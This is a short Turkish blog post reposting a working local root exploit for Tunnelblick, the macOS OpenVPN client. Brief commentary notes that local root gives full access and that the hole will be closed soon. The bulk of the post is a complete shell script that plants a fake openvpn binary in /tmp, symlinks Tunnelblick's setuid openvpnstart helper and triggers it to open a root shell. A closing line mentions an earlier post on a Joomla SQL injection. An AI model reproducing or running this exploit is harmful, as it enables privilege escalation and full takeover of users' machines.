admin | 12 Ağustos 2012
No comments

Tunnelblick Local Root Exploit

Tunnelblick Openvpn local root açığı iki kez exploit edilmiştir. ikinci c exploit linki aşağıdadır.
Local rootun tehlikelerinden bahsetmeme gerek yok görüldüğü üzere full erişim. Açık kısa zamanda kapatılacaktır.

#!/bin/sh
#### Pwnnel Blicker ####
# for kids #
# #
# zx2c4 #
# #
########################
# This is another exploit for Tunnel Blick.
# Other exploits for Tunnel Blick are available here:
echo "[+] Making vulnerable directory."
mkdir -pv /tmp/pwn/openvpn/openvpn-0
echo "[+] Preparing payload."
cat > /tmp/pwn/openvpn/openvpn-0/openvpn <<_EOF
#!/bin/sh
echo "[+] Cleaning up."
rm -rfv /tmp/pwn
echo "[+] Getting root."
exec bash
_EOF
chmod -v +x /tmp/pwn/openvpn/openvpn-0/openvpn
echo "[+] Creating symlink."
ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
echo "[+] Triggering vulnerable program."
exec /tmp/pwn/start OpenVPNInfo 0

Bir önceki yazımız olan Joomla com_fireboard - SQL Injection Vulnerability başlıklı makalemizde com_fireboard sql injection, com_fireboard sql injection açığı ve joomla sql hakkında bilgiler verilmektedir.

Category: Genel | Tags: , , ,

Bir Cevap Yazın